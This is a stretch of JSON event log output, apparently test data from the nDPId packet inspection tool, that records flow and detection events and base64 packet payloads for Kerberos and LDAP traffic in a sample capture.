00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1549337937724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337937724,"pkt":"AAgCHEeupB9ywglqCABFAACYE6pAAIAGfcSsEAgIrBAIyQBYwB6j9WqFKP9wn1AYAQCbeQAAeBxjGZR555TmhlGtfWdB3hqYo6lYswe6vKpNUcrN1M7KGcxMIdPLYhZ04dECjGI6ypolTWuvt884Bi2lq0pIFbZFVKD3x\/BnUesSWAB9L0qg+5NPzwAEggckaZSGKHdd5sXD0ux4MNvoyw986qY1Nw=="}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937725,"flow_last_seen":1549337937725,"flow_idle_time":7440000,"flow_min_l4_payload_len":80,"flow_max_l4_payload_len":80,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":80,"midstream":1,"thread_ts_msec":1549337937725,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49183,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1549337937725,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1549337937725,"pkt":"pB9ywglqAAgCHEeuCABFAAB4AONAAIAGkKusEAjJrBAICMAfAFi1TK\/3YmHJT1AYAQDj2wAAbj2wbk+derrxO0c0pxRSdruhR6\/j4Ui\/xNsBa8OfbfRkbAwdywbQynHUORFcFH8maukxsoLa+OhvD2a5+zDPKPlneJ\/sg2b\/GuIvr5ZD3Bg="}
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1549337937726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1549337937726,"pkt":"AAgCHEeupB9ywglqCABFAABQE7BAAIAGfgasEAgIrBAIyQBYwB9iYc8DtUywR1AYAQDGTwAA4zLECSz5GZPNqNSL4T5BMx8WrZoQ8TiJymulR2VkZN3O1rD+5YXABg=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940431,"flow_last_seen":1549337940431,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337940431,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49186,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1549337940431,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337940431,"pkt":"pB9ywglqAAgCHEeuCABFAACxAPpAAIAGkFusEAjJrBAICMAiAFjJGNiQqlyd6VAYAQDPPQAAiJisSNul39yNkXIaZ7I9abKKHsFn\/6nUnlpuYlwP2aMvOAIHPA5TwBaAhiWq+tFyYupNZpDDILw6OTtdBUx9AScUIqcHtp8iuHt0kMVzTn\/4u2MWOJ3B5oBzCaRbB4JGSnxRjDJCJirb6nGFgBI0LOLujBAlXiGb5mYfdXtWDkYlEBJfjMNCAaw="}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337940432,"pkt":"AAgCHEeupB9ywglqCABFAACbE79AAIAGfaysEAgIrBAIyQBYwCKqXKOdyRjZGVAYAQDDTwAAKYg87lVL35oh62EWNwE864\/2bfnOQr1tnnHZbVGEslhqWgqxgOlP8fU7tCl8Q\/Pa+OiAoCN8WQQSqJd8h73HLCORGVTkV2\/0V8MyUM0yQH1SL9l7PdXJm7IP\/IVn+E9KcR0nyC\/qPtxkWFJAw4YHnIb0GQ=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337940432,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"flow_min_l4_payload_len":359,"flow_max_l4_payload_len":359,"flow_tot_l4_payload_len":359,"flow_avg_l4_payload_len":359,"midstream":1,"thread_ts_msec":1549337940432,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49185,"dst_port":49155,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00936{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1549337940432,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":413,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":413,"pkt_l4_len":379,"thread_ts_msec":1549337940432,"pkt":"pB9ywglqAAgCHEeuCABFAAGPAP5AAIAGj3msEAjJrBAICMAhwAMZWxyAQJkJXFAYAQAR1wAA1H5mUL0BcI4qPWGkggFYMIIBVKADAgESooIBSwSCAUcbieRVkdOtAnzmcyqLDK9HyZo8H6AcRFkR6nkpd0sYlEbV82Qt31YdF5lIivhvCiptxoXnMPhE44z2QYycXFRvcJlMUVHmYJTlGAPASSmrxcFRtfwGd3CmxLGHH6gdXYYGgEzOmFuOyHJjprxX+WUkbubIb9DuIaCyGfu6WjSvDsJsxl8APFvUDVpwKCBx+yi4Nl7uparYkV7uyBIsOfius8LRX8aNw6uyL8Rg7Kcy+u\/AdDO7DcqqeIW4ECzaDnKuMDvhoDG1L4DC3Gyq10cUmszgrrBDkGwYBF3I07gVPaOITvdzOarlv0eTNHIPNCN07gmcrX\/ElHpPLwV7ZiI5SB1SY8Op3qesfZqAIqjOBGiyQU2+uy5qrSSffZHU9iojHh1BosRxcA7pQ15VJkC0LtUsgQyMbCX0W85YmDAFmZqe2ZivqK8="}
00836{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":338,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":338,"pkt_l4_len":304,"thread_ts_msec":1549337940433,"pkt":"AAgCHEeupB9ywglqCABFAAFEE8NAAIAGfP+sEAgIrBAIycADwCFAmQlcGVsd51AYAQDbOQAABQAMBxAAAAAcAagAAgAAANAW0BaIIgAABgA0OTE1NQADAAAAAgACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADMFcXG6vjdJgxm12++czDYBAAAAAwADAAAAAAAAAAAAAAAAAAAAAAAAAAAACQYAAAAAAAChgaUwgaKgAwoBAaELBgkqhkiC9xIBAgKigY0EgYpvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8Ebfn2lEYLCMVIVfFxnfrMpLLQ5jje4X2obHkLE1mHLBb3QYmIfBpDW5VyIgGbPY54D9aSU3VouXp90Sdg8ibesBCnHqUH+HJX\/hdQ0brTNgFSTOR\/m3sdIfIuZmQkzV3dPMC5PlxnwhbW8ZWYvQE="}
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1549337940433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":274,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":274,"pkt_l4_len":240,"thread_ts_msec":1549337940433,"pkt":"pB9ywglqAAgCHEeuCABFAAEEAP9AAIAGkAOsEAjJrBAICMAhwAMZWx3nQJkKeFAYAP\/gGgAABQAOAxAAAADcAIwAAgAAANAW0BYAAAAAAQAAAAEAAQA1QlHjBkvREasEAMBPwtzSBAAAADMFcXG6vjdJgxm12++czDYBAAAACQYAAAAAAAChgYkwgYagAwoBAaJfBF1vWzBZoAMCAQWhAwIBD6JNMEugAwIBEqJEBELB6nut18jCMG03H8TJyLvCf8wWF6F7BqJ4bg85nSMTOiCmzGy+a5tNrq0VYdAt2TCIZ2p1Ys\/DpnWvcPxOp0LCSoajHgQcBAQE\/\/\/\/\/\/8AAAAAVL504MDCo+3fnXZuQhY33A=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1549337951630,"pkt":"pB9ywglqAAgCHEeuCABFAAETAQ1AAIAGj+asEAjJrBAICMAjAFj9jJo6lSyMo1AYAQB4vAAAAAAA52qB5DCB4aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBvTCBuqAHAwUAQIEAEKEcMBqgAwIBAaETMBEbD3RoZXJlc2Euam9obnNvbqIMGwpIQVBQWUNSQUZUox8wHaADAgECoRYwFBsGa3JidGd0GwpIQVBQWUNSQUZUpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIEXdv8Z6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="}
00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951630,"flow_last_seen":1549337951630,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1549337951630,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1549337951631,"pkt":"AAgCHEeupB9ywglqCABFAAEYE9dAAIAGfResEAgIrBAIyQBYwCOVLIyj\/YybJVAYAQAREAAAAAAA7H6B6TCB5qADAgEFoQMCAR6kERgPMjAxOTAyMDUwMzM5MTBapQUCAwNKZqYDAgEZqQwbCkhBUFBZQ1JBRlSqHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSsgYsEgYgwgYUwYqEDAgETolsEWTBXMCagAwIBEqEfGx1IQVBQWUNSQUZULk9SR3RoZXJlc2Euam9obnNvbjAFoAMCARcwJqADAgEDoR8bHUhBUFBZQ1JBRlQuT1JHdGhlcmVzYS5qb2huc29uMAmhAwIBAqICBAAwCaEDAgEQogIEADAJoQMCAQ+iAgQA"}
00732{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337951630,"flow_last_seen":1549337951631,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":237,"midstream":1,"thread_ts_msec":1549337951631,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49187,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00879{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1549337951638,"pkt":"pB9ywglqAAgCHEeuCABFAAFjARFAAIAGj5KsEAjJrBAICMAkAFi0GLZOsNNMHlAYAQAvMAAAAAABN2qCATMwggEvoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4Wndh9xw8qUUtso0vc8TuP9R5peLYlUKrIi93QkMXsrfVII\/B8UhLSOwTSHwq5LSHP2vURJP\/YpgwEaEEAgIAgKIJBAcwBaADAQH\/pIG9MIG6oAcDBQBAgQAQoRwwGqADAgEBoRMwERsPdGhlcmVzYS5qb2huc29uogwbCkhBUFBZQ1JBRlSjHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkhBUFBZQ1JBRlSlERgPMjAzNzA5MTMwMjQ4MDVaphEYDzIwMzcwOTEzMDI0ODA1WqcGAgRd2\/xnqBUwEwIBEgIBEQIBFwIBGAIC\/3kCAQOpHTAbMBmgAwIBFKESBBBKT0hOU09OLVBDICAgICAg"}
00724{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951638,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"flow_min_l4_payload_len":315,"flow_max_l4_payload_len":315,"flow_tot_l4_payload_len":315,"flow_avg_l4_payload_len":315,"midstream":1,"thread_ts_msec":1549337951638,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49188,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft","username":"theresa.johnson"}}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1549337951638,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1549337951638,"pkt":"AAgCHEeupB9ywglqCABFAADKE9xAAIAGfWCsEAgIrBAIyQBYwCSw01HStBi3iVAYAQA+gAAAtgxIRqdE2xpJueUsyACfoBkRIO2d0vdWoZTH7\/Uq\/IekfUoxUBvBS550+iWChkmhJucRdY1OlQL1WMQC8uhxGdFWaESvp\/JzESFsbwdEK2JaAYNNrn2MyR4+4w4oYIB6xP3aoFYA9y5s01X0oEa\/3ePvjWb66V7pwZZYO9bc89yozmxDtVb4zCT8SyPCYGj7ljiOz9w+sICchbsKK+VkdLL4"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951639,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":1,"thread_ts_msec":1549337951639,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49189,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1549337951639,"pkt":"pB9ywglqAAgCHEeuCABFAABRARdAAIAGkJ6sEAjJrBAICMAlAFiRlp2kV2CH+1AYAQDPTQAAMzcwOTEzMDI0ODA1WqcGAgRd2\/xvqBIwEAIBEgIBEQIBFwIBGAIC\/3k="}
00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1549337951639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":120,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":120,"pkt_l4_len":86,"thread_ts_msec":1549337951639,"pkt":"AAgCHEeupB9ywglqCABFAABqE+JAAIAGfbqsEAgIrBAIyQBYwCVXYI2vkZadzVAYAQBXRgAAQS6YdBRcDlPtUTrjUB8narHoPerU+E0Jfux+IwijhqkO1zkqtUVGrf6H2Py3dE6xzPm7+U9W58\/67z4LH\/YlBX9v"}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337951709,"flow_last_seen":1549337951709,"flow_idle_time":7440000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":217,"midstream":1,"thread_ts_msec":1549337951709,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49190,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1549337951709,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1549337951709,"pkt":"pB9ywglqAAgCHEeuCABFAAEBAR5AAIAGj+esEAjJrBAICMAmAFg7QE\/YI2nTKVAYAQALhgAAZxsOaGFwcHljcmFmdC5vcmelERgPMjAzNzA5MTMwMjQ4MDVapwYCBF3PyFqoEjAQAgESAgERAgEXAgEYAgL\/eaqBljCBk6ADAgESooGLBIGIqYCMNPGCrPeLGO9qPK8YFBfjHxUTb+emA\/ivLTUTYudncy22kbyckKCiSeisUe8yJ84rq8HDegGsl0qK5XKbjnVH8LqImnH6XpTRvHWQpRpTszA\/lJoaM6MWsPPKugansbtAh5mO54t+2+bi3wT01iiQl45hp5bjTN1UEkZf+dFCUo8Xssy7aA=="}
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":62,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1549337951710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":244,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":244,"pkt_l4_len":210,"thread_ts_msec":1549337951710,"pkt":"AAgCHEeupB9ywglqCABFAADmE+lAAIAGfTesEAgIrBAIyQBYwCYjadjdO0BQsVAYAQAYcQAA4k0pIk9VQ3WSD8DyjCP6zDplkOu688cj7B+axduw7FbTE6AYUgZjQCgBXNnQmZk8AZkKxd6trQiOV9Q21Ig4\/vSvcG7YJA68j6K63UrdpgCrN\/5os+IHfd01LLYH5NyLiu66hLUPywBQtPqISEBXxfQa4YqqDi7eMFkF+tYnKAJyaEAa5CaoA\/k+JAFpYmNuKBJA\/cZZR\/sXThwZU9vDmuS8WhtIpf+zFLSMTZjUF9FuugxEPjg+p8gxz6TuBQ=="}
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952265,"flow_last_seen":1549337952265,"flow_idle_time":7440000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":1,"thread_ts_msec":1549337952265,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49192,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1549337952265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":255,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":255,"pkt_l4_len":221,"thread_ts_msec":1549337952265,"pkt":"pB9ywglqAAgCHEeuCABFAADxATFAAIAGj+SsEAjJrBAICMAoAFgO6N+GhTfTAFAYAQDd\/AAAZ6URGA8yMDM3MDkxMzAyNDgwNVqnBgIEXbrRWKgSMBACARICARECARcCARgCAv95qoGWMIGToAMCARKigYsEgYglkZxyflQKWP\/Ais8K06SJm4BPQtT0hjtYpqxsbw8zJYoGM4sYpjZXyTJirO221HZEfk4Zw9eEBLahQpLvN\/C8eKG6Szv5sdWvrvtDno9G1S6IPzDJUqQoaMmLFbqp3TeM2kcY2MDfHhnn2YOkxOZoLnNXNaT+dUxt2+N2MukPguNeobu829zS"}
00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1549337952266,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1549337952266,"pkt":"AAgCHEeupB9ywglqCABFAADbE\/lAAIAGfTKsEAgIrBAIyQBYwCiFN9i0DujgT1AYAQCK\/QAAiBuHmEFFmc+WsyXKuqx9Swihi4V8obVw5s2sIwUfT4tmX1K8bbM9re\/5e5wllRug+\/LlwLPFO11iuIJBpf\/1q6VzsWXZQ3Uhj6pv9Mvwu3XM\/Kg0OKnhbHwHjTwPH8AFLK9Xs6OvjCpemPsc4QD2yHfZIqmzSgyFffWrBEHUQ0oxARyRw\/cKuJ\/iV+cgVuWHP+LCTlyCV2gs4Zw\/xETck8iUuOpN6dDKbNN8Vw5JmilGwYg="}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952267,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":1,"thread_ts_msec":1549337952267,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49191,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00886{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":368,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":368,"pkt_l4_len":334,"thread_ts_msec":1549337952267,"pkt":"pB9ywglqAAgCHEeuCABFAAFiATVAAIAGj2+sEAjJrBAICMAnAYUlT+9+CA99hlAYAQDCQwAAdUvVLNApPEvRYHXzTe8zaxz\/9SHPb\/8TWpCDGqMEAHclvciM0GOY0+pGIhzH\/f\/6jOacNFpBroqFCWgt6TZwWzHkJCgQPX52B1IK52bZg0ONYZDAO1UzroKY+wbOMCsJF8\/BbP9OSbZKzzlfun2r96DSICH7w7yEUFli3VQeP0ogbe+3tFoHFjb+05dbP\/VPGYwLelBDF4MSfNFsp+OMFLmJGy8zQTsDu6jfRxBXMbl8NmKpljCGrvpbK91ZL6OpbzC0zmaE6i4hHgj8sVok02UOBn0gMsv\/uMFl8gfFKRQNU\/cuTbNe+ET9apWENw\/dcLPR6pjmHtriptNJoQ3zVjS2Tc+IkoIqsOQ3cvktrgQFCtQLWZP3pztmcBjhot2oF4ypo07u7Pn3GnXRKfmep\/RhPO\/A8\/McJI0="}
00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1549337952267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337952267,"pkt":"AAgCHEeupB9ywglqCABFAAD6E\/1AAIAGfQ+sEAgIrBAIyQGFwCcID32GJU\/wuFAYAQAMIAAAMIQAAADMAgEPYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG1aIGsolL+fu1BeIvW0ck8xNtulprbrU8LwWAQ+0HLcHzxYvBiLYdCRYKwhIeaZIrmfEg+Fmg6VMrCzRHOuCMx3gqqLIgnuXXvz9jtqiRlG1LxGN\/8hm6Dc5JLtY2J2bRsWOZJSU4VCKr7ax6LU"}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337952273,"flow_last_seen":1549337952273,"flow_idle_time":7440000,"flow_min_l4_payload_len":330,"flow_max_l4_payload_len":330,"flow_tot_l4_payload_len":330,"flow_avg_l4_payload_len":330,"midstream":1,"thread_ts_msec":1549337952273,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49193,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
